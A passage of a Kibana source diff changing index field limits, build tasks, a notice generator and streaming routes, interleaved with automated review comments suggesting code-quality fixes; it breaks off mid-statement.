+ // @ts-expect-error https://github.com/elastic/elasticsearch/issues/89381
+ expect(cloneTarget1.settings?.index.mapping?.total_fields.limit).toBe('1500');
+ expect(cloneTarget1.settings?.blocks?.write).toBeUndefined();
 });
 it('resolves right if clone target already existed after waiting for index status to be green ', async () => {
 expect.assertions(2);
@@ -1612,6 +1618,11 @@ describe('migration actions', () => {
 _tag: 'Right',
 right: 'create_index_succeeded',
 });
+ const { create_new_index: createNewIndex } = await client.indices.getSettings({
+ index: 'create_new_index',
+ });
+ // @ts-expect-error https://github.com/elastic/elasticsearch/issues/89381
+ expect(createNewIndex.settings?.index?.mapping.total_fields.limit).toBe('1500');
 });
 it('resolves left if an existing index status does not become green', async () => {
 expect.assertions(2);
diff --git a/src/core/server/saved_objects/migrations/actions/clone_index.ts b/src/core/server/saved_objects/migrations/actions/clone_index.ts
index 80b2ff527740c..e95f969f4ad82 100644
--- a/src/core/server/saved_objects/migrations/actions/clone_index.ts
+++ b/src/core/server/saved_objects/migrations/actions/clone_index.ts
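Review bot: The two new assertions reach the same setting through different optional-chaining shapes — `settings?.index.mapping?.total_fields.limit` in the first hunk and `settings?.index?.mapping.total_fields.limit` in the second — so the two `@ts-expect-error` directives suppress slightly different errors and the difference reads as accidental. Use one form in both, e.g. `settings?.index?.mapping?.total_fields?.limit`, and consider a shared local such as `const TOTAL_FIELDS_LIMIT = '1500';` so the expected value is declared once instead of as a literal in two tests. Tying the directives to the upstream issue is good: `@ts-expect-error` will fail compilation once the client types are fixed, which prompts their removal.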
@@ -64,20 +64,25 @@ export const cloneIndex = ({
 index: source,
 target,
 wait_for_active_shards: WAIT_FOR_ALL_SHARDS_TO_BE_ACTIVE,
- body: {
- settings: {
- index: {
- // The source we're cloning from will have a write block set, so
- // we need to remove it to allow writes to our newly cloned index
- 'blocks.write': false,
- number_of_shards: INDEX_NUMBER_OF_SHARDS,
- auto_expand_replicas: INDEX_AUTO_EXPAND_REPLICAS,
- // Set an explicit refresh interval so that we don't inherit the
- // value from incorrectly configured index templates (not required
- // after we adopt system indices)
- refresh_interval: '1s',
- // Bump priority so that recovery happens before newer indices
- priority: 10,
+ settings: {
+ index: {
+ // The source we're cloning from will have a write block set, so
+ // we need to remove it to allow writes to our newly cloned index
+ 'blocks.write': false,
+ // The rest of the index settings should have already been applied
+ // to the source index and will be copied to the clone target. But
+ // we repeat it here for explicitness.
+ number_of_shards: INDEX_NUMBER_OF_SHARDS,
+ auto_expand_replicas: INDEX_AUTO_EXPAND_REPLICAS,
+ // Set an explicit refresh interval so that we don't inherit the
+ // value from incorrectly configured index templates (not required
+ // after we adopt system indices)
+ refresh_interval: '1s',
+ // Bump priority so that recovery happens before newer indices
+ priority: 10,
+ // Increase the fields limit beyond the default of 1000
+ mapping: {
+ total_fields: { limit: 1500 },
 },
 },
 },
diff --git a/src/core/server/saved_objects/migrations/actions/create_index.ts b/src/core/server/saved_objects/migrations/actions/create_index.ts
index 41ee20fc9562d..0f6b062a42163 100644
--- a/src/core/server/saved_objects/migrations/actions/create_index.ts
+++ b/src/core/server/saved_objects/migrations/actions/create_index.ts
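Review bot: The field limit `1500` is a bare literal here and again in the create_index.ts hunk that follows, and the integration tests assert the string `'1500'` in two more places, so a future change has four spots to keep in sync. The sibling settings already come from shared constants (`INDEX_NUMBER_OF_SHARDS`, `INDEX_AUTO_EXPAND_REPLICAS`); a constant alongside them, e.g. `total_fields: { limit: INDEX_MAPPING_TOTAL_FIELDS_LIMIT }`, would keep the two index actions in agreement. create_index.ts needs a `// @ts-expect-error` on `mapping` while this file does not, which suggests the two request bodies are typed differently; a one-line comment saying why would stop the next reader from "fixing" one of them. The enclosing `cloneIndex` body continues outside the hunk.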
@@ -82,21 +82,24 @@ export const createIndex = ({ // available. If the request doesn't complete within timeout, // acknowledged or shards_acknowledged would be false. timeout, - body: { - mappings, - aliases: aliasesObject, - settings: { - index: { - // ES rule of thumb: shards should be several GB to 10's of GB, so - // Kibana is unlikely to cross that limit. - number_of_shards: 1, - auto_expand_replicas: INDEX_AUTO_EXPAND_REPLICAS, - // Set an explicit refresh interval so that we don't inherit the - // value from incorrectly configured index templates (not required - // after we adopt system indices) - refresh_interval: '1s', - // Bump priority so that recovery happens before newer indices - priority: 10, + mappings, + aliases: aliasesObject, + settings: { + index: { + // ES rule of thumb: shards should be several GB to 10's of GB, so + // Kibana is unlikely to cross that limit. + number_of_shards: 1, + auto_expand_replicas: INDEX_AUTO_EXPAND_REPLICAS, + // Set an explicit refresh interval so that we don't inherit the + // value from incorrectly configured index templates (not required + // after we adopt system indices) + refresh_interval: '1s', + // Bump priority so that recovery happens before newer indices + priority: 10, + // Increase the fields limit beyond the default of 1000 + // @ts-expect-error https://github.com/elastic/elasticsearch/issues/89381 + mapping: { + total_fields: { limit: 1500 }, }, }, }, diff --git a/src/core/server/saved_objects/migrations/core/document_migrator.test.ts b/src/core/server/saved_objects/migrations/core/document_migrator.test.ts index d126cdce88253..1d12d2062be93 100644 --- a/src/core/server/saved_objects/migrations/core/document_migrator.test.ts +++ b/src/core/server/saved_objects/migrations/core/document_migrator.test.ts 
@@ -7,7 +7,7 @@ */ import { mockGetConvertedObjectId } from './document_migrator.test.mock'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import type { SavedObjectUnsanitizedDoc, SavedObjectsType } from '@kbn/core-saved-objects-server'; import { DocumentMigrator } from './document_migrator'; diff --git a/src/core/server/saved_objects/migrations/core/document_migrator.ts b/src/core/server/saved_objects/migrations/core/document_migrator.ts index 3782a74936b6e..677b2a685f64e 100644 --- a/src/core/server/saved_objects/migrations/core/document_migrator.ts +++ b/src/core/server/saved_objects/migrations/core/document_migrator.ts @@ -43,7 +43,7 @@ import Boom from '@hapi/boom'; import uuidv5 from 'uuid/v5'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import Semver from 'semver'; import type { Logger } from '@kbn/logging'; diff --git a/src/core/server/saved_objects/migrations/core/migrate_raw_docs.test.ts b/src/core/server/saved_objects/migrations/core/migrate_raw_docs.test.ts index 03124f6e7fde7..09ec13bcae05b 100644 --- a/src/core/server/saved_objects/migrations/core/migrate_raw_docs.test.ts +++ b/src/core/server/saved_objects/migrations/core/migrate_raw_docs.test.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import * as Either from 'fp-ts/lib/Either'; import _ from 'lodash'; import { SavedObjectTypeRegistry } from '../../saved_objects_type_registry'; diff --git a/src/core/server/saved_objects/service/lib/filter_utils.ts b/src/core/server/saved_objects/service/lib/filter_utils.ts index 27ff1c201cbdd..30880368d096d 100644 --- a/src/core/server/saved_objects/service/lib/filter_utils.ts +++ b/src/core/server/saved_objects/service/lib/filter_utils.ts 
@@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, cloneDeep } from 'lodash'; import * as esKuery from '@kbn/es-query'; import { SavedObjectsErrorHelpers } from './errors'; diff --git a/src/core/server/ui_settings/saved_objects/migrations.test.ts b/src/core/server/ui_settings/saved_objects/migrations.test.ts index df561ef4152f6..c08f75ad9d184 100644 --- a/src/core/server/ui_settings/saved_objects/migrations.test.ts +++ b/src/core/server/ui_settings/saved_objects/migrations.test.ts @@ -310,3 +310,38 @@ describe('ui_settings 8.1.0 migrations', () => { }); }); }); + +describe('ui_settings 8.5.0 migrations', () => { + const migration = migrations['8.5.0']; + + test('returns doc on empty object', () => { + expect(migration({} as SavedObjectUnsanitizedDoc)).toEqual({ + references: [], + }); + }); + + test('removes "observability:enableInfrastructureView" setting', () => { + const doc = { + type: 'config', + id: '8.5.0', + attributes: { + buildNum: 9007199254740991, + 'observability:enableInfrastructureView': true, + }, + references: [], + updated_at: '2020-06-09T20:18:20.349Z', + migrationVersion: {}, + }; + + expect(migration(doc)).toEqual({ + type: 'config', + id: '8.5.0', + attributes: { + buildNum: 9007199254740991, + }, + references: [], + updated_at: '2020-06-09T20:18:20.349Z', + migrationVersion: {}, + }); + }); +}); diff --git a/src/core/server/ui_settings/saved_objects/migrations.ts b/src/core/server/ui_settings/saved_objects/migrations.ts index 7ed65cfe61894..73b51254d1869 100644 --- a/src/core/server/ui_settings/saved_objects/migrations.ts +++ b/src/core/server/ui_settings/saved_objects/migrations.ts 
@@ -138,4 +138,25 @@ export const migrations = { }), references: doc.references || [], }), + '8.5.0': (doc: SavedObjectUnsanitizedDoc): SavedObjectSanitizedDoc => ({ + ...doc, + ...(doc.attributes && { + attributes: Object.keys(doc.attributes).reduce( + (acc, key) => + [ + // owner: Team:Apm + 'observability:enableInfrastructureView', + ].includes(key) + ? { + ...acc, + } + : { + ...acc, + [key]: doc.attributes[key], + }, + {} + ), + }), + references: doc.references || [], + }), }; diff --git a/src/dev/build/build_distributables.ts b/src/dev/build/build_distributables.ts index a3c2737857a68..0649c5ddc946a 100644 --- a/src/dev/build/build_distributables.ts +++ b/src/dev/build/build_distributables.ts @@ -79,17 +79,20 @@ export async function buildDistributables(log: ToolingLog, options: BuildOptions await run(Tasks.BuildCanvasShareableRuntime); } await run(Tasks.BuildKibanaPlatformPlugins); - await run(Tasks.TranspileBabel); await run(Tasks.CreatePackageJson); await run(Tasks.InstallDependencies); await run(Tasks.GeneratePackagesOptimizedAssets); - await run(Tasks.DeleteBazelPackagesFromBuildRoot); + + // Run on all source files + // **/packages need to be read + // before DeleteBazelPackagesFromBuildRoot await run(Tasks.CreateNoticeFile); await run(Tasks.CreateXPackNoticeFile); + + await run(Tasks.DeleteBazelPackagesFromBuildRoot); await run(Tasks.UpdateLicenseFile); await run(Tasks.RemovePackageJsonDeps); await run(Tasks.CleanPackageManagerRelatedFiles); - await run(Tasks.CleanTypescript); await run(Tasks.CleanExtraFilesFromModules); await run(Tasks.CleanEmptyFolders); await run(Tasks.FleetDownloadElasticGpgKey); diff --git a/src/dev/build/tasks/clean_tasks.ts b/src/dev/build/tasks/clean_tasks.ts index 38be91ad04a6a..6184c568df07d 100644 --- a/src/dev/build/tasks/clean_tasks.ts +++ b/src/dev/build/tasks/clean_tasks.ts 
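Review bot: The new comment over `CreateNoticeFile` (`// Run on all source files` / `// **/packages need to be read` / `// before DeleteBazelPackagesFromBuildRoot`) reads as three fragments and does not say which tasks the constraint applies to; since the NOTICE file is the license-attribution artifact shipped with the build, the ordering dependency deserves one precise sentence. Suggest: `// CreateNoticeFile and CreateXPackNoticeFile scan every source file, including **/packages, so they must run before DeleteBazelPackagesFromBuildRoot.` With `TranspileBabel` and `CleanTypescript` gone from this list, a second comment pointing to where transpilation now happens (the CopySource worker introduced in this commit) would help the next reader of the task order. `buildDistributables` continues outside the hunk.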
@@ -34,20 +34,6 @@ export const CleanPackageManagerRelatedFiles: Task = { }, }; -export const CleanTypescript: Task = { - description: 'Cleaning typescript source files that have been transpiled to JS', - - async run(config, log, build) { - log.info( - 'Deleted %d files', - await scanDelete({ - directory: build.resolvePath(), - regularExpressions: [/\.(ts|tsx|d\.ts)$/, /tsconfig.*\.(json|tsbuildinfo)$/], - }) - ); - }, -}; - export const CleanExtraFilesFromModules: Task = { description: 'Cleaning tests, examples, docs, etc. from node_modules', @@ -198,7 +184,7 @@ export const CleanExtraFilesFromModules: Task = { '**/@elastic/eui/test-env', '**/@elastic/eui/optimize', '**/@elastic/eui/i18ntokens.json', - ]); + ]).concat([/\.(ts|tsx|d\.ts)$/, /tsconfig.*\.(json|tsbuildinfo)$/]); log.info( 'Deleted %d files', diff --git a/src/dev/build/tasks/copy_source_task.ts b/src/dev/build/tasks/copy_source_task.ts index 4140b142d177f..0e4407cf767b0 100644 --- a/src/dev/build/tasks/copy_source_task.ts +++ b/src/dev/build/tasks/copy_source_task.ts 
@@ -6,65 +6,69 @@ * Side Public License, v 1. */ -import { discoverBazelPackages } from '@kbn/bazel-packages'; +import { resolve } from 'path'; -import { copyAll, Task } from '../lib'; +import globby from 'globby'; +import Piscina from 'piscina'; + +import { Task } from '../lib'; export const CopySource: Task = { description: 'Copying source into platform-generic build directory', async run(config, log, build) { - await copyAll(config.resolveFromRepo(), build.resolvePath(), { - dot: false, - select: [ - 'yarn.lock', - '.npmrc', - 'kibana.d.ts', - 'config/kibana.yml', - 'config/node.options', - 'typings/**', - 'tsconfig*.json', - '.i18nrc.json', - 'src/**', - - 'x-pack/plugins/**', - 'x-pack/.i18nrc.json', - 'x-pack/package.json', + const select = [ + 'yarn.lock', + '.npmrc', + 'config/kibana.yml', + 'config/node.options', + '.i18nrc.json', + 'src/**', - '!{src,x-pack}/**/*.{test,test.mocks,mock,mocks}.*', - '!{src,x-pack}/**/target/**', - '!{src,x-pack}/**/{__stories__,storybook,.storybook}/**', - '!{src,x-pack}/**/{test,tests,test_resources,test_data,__tests__,manual_tests,__jest__,__snapshots__,__mocks__,mock_responses,mocks,fixtures,__fixtures__,cypress,integration_tests}/**', + 'x-pack/plugins/**', + 'x-pack/.i18nrc.json', + 'x-pack/package.json', - '!src/dev/**', - '!src/**/mocks.{js,ts}', - '!src/cli/repl/**', - '!src/cli*/dev.js', - '!src/plugins/telemetry/schema/**', - '!src/core/server/core_app/assets/favicons/favicon.distribution.{ico,png,svg}', - '!src/functional_test_runner/**', - '!src/setup_node_env/index.js', + '!src/dev/**', + '!src/**/mocks.{js,ts}', + '!src/cli*/dev.js', + '!src/plugins/telemetry/schema/**', + '!src/core/server/core_app/assets/favicons/favicon.distribution.{ico,png,svg}', + '!src/setup_node_env/index.js', - '!x-pack/plugins/**/{ftr_e2e,e2e}/**', - '!x-pack/plugins/**/scripts/**', - '!x-pack/plugins/telemetry_collection_xpack/schema/**', + '!x-pack/plugins/telemetry_collection_xpack/schema/**', - '!**/jest.config.js', - 
'!**/jest.config.dev.js', - '!**/jest.integration.config.js', - '!**/jest_setup.{js,ts}', - '!**/*.{story,stories}.{js,ts}', - '!**/test_mocks.ts', - '!**/*.{sh,md,mdx,asciidoc}', - '!**/*.console', - '!**/*.scss', - '!**/*.docnav.json', - '!**/{dev_docs,docs}/**', - '!**/public/**/*.{js,ts,tsx,json}', + '!**/jest*', + '!**/*.{story,stories}.{js,ts}', + '!**/test_mocks.ts', + '!**/*.{scss,console,d.ts,sh,md,mdx,asciidoc,docnav.json}', + '!**/*.{test,test.mocks,mock,mocks,spec}.*', + '!**/{packages,dev_docs,docs,public,__stories__,storybook,.storybook,ftr_e2e,e2e,scripts,test,tests,test_resources,test_data,__tests__,manual_tests,__jest__,__snapshots__,__mocks__,mock_responses,mocks,fixtures,__fixtures__,cypress,integration_tests}/**', + ]; - // explicitly ignore all bazel package locations, even if they're not selected by previous patterns - ...(await discoverBazelPackages()).map((pkg) => `!${pkg.normalizedRepoRelativeDir}/**`), - ], + const piscina = new Piscina({ + filename: resolve(__dirname, 'copy_source_worker.js'), }); + + const globbyOptions = { cwd: config.resolveFromRepo('.') }; + const tasks = ( + await Promise.all([ + globby(select, globbyOptions), + globby( + [ + '{x-pack,src}/plugins/*/public/assets/**', + 'src/plugins/data/server/scripts/**', + 'x-pack/plugins/fleet/server/services/epm/packages/**', + '!x-pack/plugins/fleet/server/services/epm/packages/*.test.ts', + ], + globbyOptions + ), + ]) + ) + .flat() + .map((source) => piscina.run({ source })); + + await Promise.all(tasks); + await piscina.destroy(); }, }; diff --git a/src/dev/build/tasks/copy_source_worker.js b/src/dev/build/tasks/copy_source_worker.js new file mode 100644 index 0000000000000..5f18cf6f46eab --- /dev/null +++ b/src/dev/build/tasks/copy_source_worker.js 
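Review bot: `piscina.destroy()` is only reached when every `piscina.run` promise resolves, so a single worker failure rejects `Promise.all(tasks)` and leaves the pool alive, which may keep the build process from exiting and hides the real error behind a hang. Wrap the wait: `try { await Promise.all(tasks); } finally { await piscina.destroy(); }`. The `select` list replaces the explicit `discoverBazelPackages()` exclusions with `!**/{packages,...}/**`, which is broader (any directory named `packages`) and is presumably why the second `globby` call re-adds fleet's `epm/packages`; a comment tying those two together would stop someone from "simplifying" one without the other. The `run` method starts on the previous line, outside this part of the hunk.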
@@ -0,0 +1,64 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0 and the Server Side Public License, v 1; you may not use this file except
+ * in compliance with, at your election, the Elastic License 2.0 or the Server
+ * Side Public License, v 1.
+ */
+
+const { writeFileSync, readFileSync, copyFileSync, mkdirSync } = require('fs');
+const { resolve, extname, dirname } = require('path');
+
+const { optimize } = require('svgo');
+const { transformFileSync } = require('@babel/core');
+
+const presets = require('@kbn/babel-preset/node_preset');
+
+const { REPO_ROOT } = require('@kbn/utils');
+const BUILD_ROOT = resolve(REPO_ROOT, 'build', 'kibana');
+
+const babelOptions = {
+ presets: [[presets, { 'kibana/rootDir': REPO_ROOT }]],
+ cwd: REPO_ROOT,
+ babelrc: false,
+ sourceMaps: false,
+ ast: false,
+};
+
+const svgOptions = {
+ removeComments: false,
+};
+
+module.exports = ({ source }) => {
+ const absoluteSource = resolve(REPO_ROOT, source);
+ const absoluteDest = resolve(BUILD_ROOT, source);
+
+ mkdirSync(dirname(absoluteDest), { recursive: true });
+
+ const extension = extname(source);
+ switch (extension) {
+ case '.js':
+ case '.ts':
+ case '.tsx':
+ const output = transformFileSync(absoluteSource, babelOptions);
+ if (output.code) {
+ const dest = absoluteDest.substring(0, absoluteDest.lastIndexOf('.')) + '.js';
+ writeFileSync(dest, output.code);
+ }
+ break;
+ case '.svg':
+ const input = readFileSync(absoluteSource, 'utf-8');
+ const result = optimize(input, {
+ path: source,
+ ...svgOptions,
+ });
+ if (result.error) throw new Error(result.error);
+ if (typeof result.data === 'string') {
+ const output = Buffer.from(result.data);
+ writeFileSync(absoluteDest, output);
+ }
+ break;
+ default:
+ copyFileSync(absoluteSource, absoluteDest);
+ }
+};
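Review bot: In the `.js`/`.ts`/`.tsx` case, `if (output.code)` silently writes nothing when `code` is falsy, and dereferencing `output.code` throws a bare TypeError when `transformFileSync` returns `null` for a file its config ignores, so a source file can vanish from the build without a message that names it. Prefer an explicit failure: `if (!output || output.code == null) throw new Error(\`babel produced no output for ${source}\`);`. The `const` declarations directly inside `case` clauses (`output`, `input`, `result`) all live in the single switch scope, with a second `output` shadowing the first inside the `.svg` branch; wrapping each case body in braces keeps `no-case-declarations` quiet and makes the two `output` variables visibly distinct. `dest` replaces the last extension with `.js`, so a `.ts` and a `.js` file sharing a stem would overwrite each other in the build; a comment stating that this cannot happen, or a collision check, would make the assumption explicit.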
diff --git a/src/dev/build/tasks/generate_packages_optimized_assets.ts b/src/dev/build/tasks/generate_packages_optimized_assets.ts index d1a8ec6d20824..0f2e22a3c1444 100644 --- a/src/dev/build/tasks/generate_packages_optimized_assets.ts +++ b/src/dev/build/tasks/generate_packages_optimized_assets.ts @@ -14,8 +14,6 @@ import fs from 'fs'; import gulpBrotli from 'gulp-brotli'; // @ts-expect-error -import gulpGzip from 'gulp-gzip'; -// @ts-expect-error import gulpPostCSS from 'gulp-postcss'; // @ts-expect-error import gulpTerser from 'gulp-terser'; @@ -66,17 +64,6 @@ async function optimizeAssets(log: ToolingLog, assetDir: string) { }), vfs.dest(assetDir) ); - - log.debug('GZip compress'); - await asyncPipeline( - vfs.src(['**/*.{js,css}'], { cwd: assetDir }), - gulpGzip({ - gzipOptions: { - level: 9, - }, - }), - vfs.dest(assetDir) - ); } finally { log.indent(-4); } diff --git a/src/dev/build/tasks/index.ts b/src/dev/build/tasks/index.ts index 4ce5ae51f34c7..51d501e78e052 100644 --- a/src/dev/build/tasks/index.ts +++ b/src/dev/build/tasks/index.ts @@ -32,7 +32,6 @@ export * from './assert_file_time'; export * from './assert_no_uuid'; export * from './assert_path_length'; export * from './replace_favicon'; -export * from './transpile_babel_task'; export * from './verify_env_task'; export * from './write_sha_sums_task'; export * from './fetch_agent_versions_list'; diff --git a/src/dev/build/tasks/os_packages/docker_generator/resources/base/bin/kibana-docker b/src/dev/build/tasks/os_packages/docker_generator/resources/base/bin/kibana-docker index 6651b0cff0611..a44b309f03a43 100755 --- a/src/dev/build/tasks/os_packages/docker_generator/resources/base/bin/kibana-docker +++ b/src/dev/build/tasks/os_packages/docker_generator/resources/base/bin/kibana-docker 
@@ -221,6 +221,7 @@ kibana_vars=( xpack.alerting.rules.minimumScheduleInterval.value xpack.alerting.rules.minimumScheduleInterval.enforce xpack.alerting.rules.run.actions.max + xpack.alerting.rules.run.alerts.max xpack.alerting.rules.run.actions.connectorTypeOverrides xpack.alerts.healthCheck.interval xpack.alerts.invalidateApiKeysTask.interval diff --git a/src/dev/build/tasks/transpile_babel_task.ts b/src/dev/build/tasks/transpile_babel_task.ts deleted file mode 100644 index ee7d1e19de43a..0000000000000 --- a/src/dev/build/tasks/transpile_babel_task.ts +++ /dev/null 
@@ -1,78 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { discoverBazelPackages } from '@kbn/bazel-packages'; -import { pipeline } from 'stream'; -import { promisify } from 'util'; - -// @ts-expect-error @types/gulp-babel is outdated and doesn't work for gulp-babel v8 -import gulpBabel from 'gulp-babel'; -import vfs from 'vinyl-fs'; - -import { Task, Build } from '../lib'; - -const asyncPipeline = promisify(pipeline); - -const transpileWithBabel = async (srcGlobs: string[], build: Build, preset: string) => { - const buildRoot = build.resolvePath(); - - await asyncPipeline( - vfs.src( - srcGlobs.concat([ - '!**/*.d.ts', - '!**/node_modules/**', - '!**/bower_components/**', - '!**/__tests__/**', - ...(await discoverBazelPackages()).map((pkg) => `!${pkg.normalizedRepoRelativeDir}/**`), - ]), - { - cwd: buildRoot, - } - ), - - gulpBabel({ - babelrc: false, - presets: [ - [ - preset, - { - // we pass this so that @kbn/babel-plugin-synthetic-packages can correct absolute imports - // for packages to relative requests, without having to discover the Kibana repo root, which - // it can't do because at this point in the build there isn't a package.json file for the - // plugin to find. 
- 'kibana/rootDir': build.resolvePath('.'), - }, - ], - ], - }), - - vfs.dest(buildRoot) - ); -}; - -export const TranspileBabel: Task = { - description: 'Transpiling sources with babel', - - async run(config, log, build) { - // Transpile server code - await transpileWithBabel( - ['**/*.{js,ts,tsx}', '!**/public/**'], - build, - require.resolve('@kbn/babel-preset/node_preset') - ); - - // Transpile client code - // NOTE: For the client, as we have the optimizer, we are only - // pre-transpiling the typescript based files - await transpileWithBabel( - ['**/public/**/*.{ts,tsx}'], - build, - require.resolve('@kbn/babel-preset/webpack_preset') - ); - }, -}; diff --git a/src/dev/notice/generate_notice_from_source.ts b/src/dev/notice/generate_notice_from_source.ts index 8d162154bc5f0..7abfce7891c1a 100644 --- a/src/dev/notice/generate_notice_from_source.ts +++ b/src/dev/notice/generate_notice_from_source.ts @@ -6,7 +6,10 @@ * Side Public License, v 1. */ -import vfs from 'vinyl-fs'; +import { readFile } from 'fs/promises'; +import { relative } from 'path'; +import globby from 'globby'; + import { ToolingLog } from '@kbn/tooling-log'; const NOTICE_COMMENT_RE = /\/\*[\s\n\*]*@notice([\w\W]+?)\*\//g; 
@@ -30,45 +33,37 @@ interface Options { * into the repository. */ export async function generateNoticeFromSource({ productName, directory, log }: Options) { - const globs = ['**/*.{js,less,css,ts,tsx}']; - - const options = { - cwd: directory, - nodir: true, - ignore: [ - '{node_modules,build,dist,data,built_assets}/**', - 'packages/*/{node_modules,build,dist}/**', - 'src/plugins/*/{node_modules,build,dist}/**', - 'x-pack/{node_modules,build,dist,data}/**', - 'x-pack/packages/*/{node_modules,build,dist}/**', - 'x-pack/plugins/**/{node_modules,build,dist}/**', - '**/target/**', - ], - }; + const select = [ + '**/*.{js,mjs,scss,css,ts,tsx}', + '!{node_modules,build,dist,data,built_assets,shared_built_assets}/**', + '!packages/*/{node_modules,build,dist}/**', + '!src/plugins/*/{node_modules,build,dist}/**', + '!x-pack/{node_modules,build,dist,data}/**', + '!x-pack/packages/*/{node_modules,build,dist}/**', + '!x-pack/plugins/**/{node_modules,build,dist}/**', + '!**/target/**', + ]; - log.debug('vfs.src globs', globs); - log.debug('vfs.src options', options); log.info(`Searching ${directory} for multi-line comments starting with @notice`); - const files = vfs.src(globs, options); - const noticeComments: string[] = []; - await new Promise((resolve, reject) => { - files - .on('data', (file) => { - log.verbose(`Checking for @notice comments in ${file.relative}`); - - const source = file.contents.toString('utf8'); - let match; - while ((match = NOTICE_COMMENT_RE.exec(source)) !== null) { - log.info(`Found @notice comment in ${file.relative}`); - if (!noticeComments.includes(match[1])) { - noticeComments.push(match[1]); - } - } - }) - .on('error', reject) - .on('end', resolve); + const files = globby.stream(select, { + cwd: directory, + followSymbolicLinks: false, + absolute: true, }); + const noticeComments: string[] = []; + for await (const file of files) { + const source = await readFile(file, 'utf-8'); + const relativeFile = relative(directory, file.toString()); + 
log.verbose(`Checking for @notice comments in ${relativeFile}`); + let match; + while ((match = NOTICE_COMMENT_RE.exec(source)) !== null) { + log.info(`Found @notice comment in ${relativeFile}`); + if (!noticeComments.includes(match[1])) { + noticeComments.push(match[1]); + } + } + } let noticeText = ''; noticeText += `${productName}\n`; diff --git a/src/dev/precommit_hook/casing_check_config.js b/src/dev/precommit_hook/casing_check_config.js index 0c65b924f14b1..418a8f448b2c8 100644 --- a/src/dev/precommit_hook/casing_check_config.js +++ b/src/dev/precommit_hook/casing_check_config.js @@ -54,7 +54,7 @@ export const IGNORE_FILE_GLOBS = [ '**/preview-head.html', // filename must match upstream filenames from lodash - 'packages/elastic-safer-lodash-set/**/*', + 'packages/kbn-safer-lodash-set/**/*', // filename must match upstream filenames from handlebars 'packages/kbn-handlebars/src/upstream/**/*', diff --git a/src/dev/storybook/aliases.ts b/src/dev/storybook/aliases.ts index 89e78848a1366..7bb26e526be3d 100644 --- a/src/dev/storybook/aliases.ts +++ b/src/dev/storybook/aliases.ts @@ -13,6 +13,7 @@ export const storybookAliases = { ci_composite: '.ci/.storybook', cloud: 'x-pack/plugins/cloud/.storybook', coloring: 'packages/kbn-coloring/.storybook', + chart_icons: 'packages/kbn-chart-icons/.storybook', controls: 'src/plugins/controls/storybook', custom_integrations: 'src/plugins/custom_integrations/storybook', dashboard_enhanced: 'x-pack/plugins/dashboard_enhanced/.storybook', 
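Review bot: The new `select` list drops `less` from the extension set (`'**/*.{js,less,css,ts,tsx}'` became `'**/*.{js,mjs,scss,css,ts,tsx}'`), so an `@notice` comment in any remaining `.less` file no longer reaches the generated NOTICE; if no such files exist any more, a comment saying so would make the narrowing deliberate, otherwise keep `less`. `followSymbolicLinks: false` is the right choice for a license scan, since following links could pull files from outside `directory` into it, and deserves a one-line comment so it survives later edits: `// do not follow links: only files physically under `directory` belong in this NOTICE`. Running `globby` with `absolute: true` and then `relative(directory, file.toString())` does two conversions where leaving `absolute` off and reading `resolve(directory, file)` would do one. `generateNoticeFromSource` continues outside the hunk.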
@@ -38,7 +39,7 @@ export const storybookAliases = { observability: 'x-pack/plugins/observability/.storybook', presentation: 'src/plugins/presentation_util/storybook', security_solution: 'x-pack/plugins/security_solution/.storybook', - shared_ux: 'packages/kbn-shared-ux-storybook/src/config', + shared_ux: 'packages/shared-ux/storybook/config', threat_intelligence: 'x-pack/plugins/threat_intelligence/.storybook', ui_actions_enhanced: 'src/plugins/ui_actions_enhanced/.storybook', unified_search: 'src/plugins/unified_search/.storybook', diff --git a/src/plugins/bfetch/server/plugin.ts b/src/plugins/bfetch/server/plugin.ts index 87a44956a4ffc..cf7026b375702 100644 --- a/src/plugins/bfetch/server/plugin.ts +++ b/src/plugins/bfetch/server/plugin.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import type { +import { CoreStart, PluginInitializerContext, CoreSetup, @@ -14,6 +14,9 @@ import type { Logger, KibanaRequest, StartServicesAccessor, + RequestHandlerContext, + RequestHandler, + KibanaResponseFactory, } from '@kbn/core/server'; import { schema } from '@kbn/config-schema'; import { map$ } from '@kbn/std'; @@ -46,7 +49,12 @@ export interface BfetchServerSetup { ) => void; addStreamingResponseRoute: ( path: string, - params: (request: KibanaRequest) => StreamingResponseHandler + params: ( + request: KibanaRequest, + context: RequestHandlerContext + ) => StreamingResponseHandler, + method?: 'GET' | 'POST' | 'PUT' | 'DELETE', + pluginRouter?: ReturnType ) => void; } @@ -59,6 +67,9 @@ const streamingHeaders = { 'Transfer-Encoding': 'chunked', }; +interface Query { + compress: boolean; +} export class BfetchServerPlugin implements Plugin< 
@@ -105,25 +116,45 @@ export class BfetchServerPlugin router: ReturnType; logger: Logger; }): BfetchServerSetup['addStreamingResponseRoute'] => - (path, handler) => { - router.post( - { - path: `/${removeLeadingSlash(path)}`, - validate: { - body: schema.any(), - query: schema.object({ compress: schema.boolean({ defaultValue: false }) }), - }, + (path, handler, method = 'POST', pluginRouter) => { + const httpRouter = pluginRouter || router; + const routeDefinition = { + path: `/${removeLeadingSlash(path)}`, + validate: { + body: schema.any(), + query: schema.object({ compress: schema.boolean({ defaultValue: false }) }), }, - async (context, request, response) => { - const handlerInstance = handler(request); - const data = request.body; - const compress = request.query.compress; - return response.ok({ - headers: streamingHeaders, - body: createStream(handlerInstance.getResponseStream(data), logger, compress), - }); - } - ); + }; + const routeHandler: RequestHandler = async ( + context: RequestHandlerContext, + request: KibanaRequest, + response: KibanaResponseFactory + ) => { + const handlerInstance = handler(request, context); + const data = request.body; + const compress = request.query.compress; + return response.ok({ + headers: streamingHeaders, + body: createStream(handlerInstance.getResponseStream(data), logger, compress), + }); + }; + + switch (method) { + case 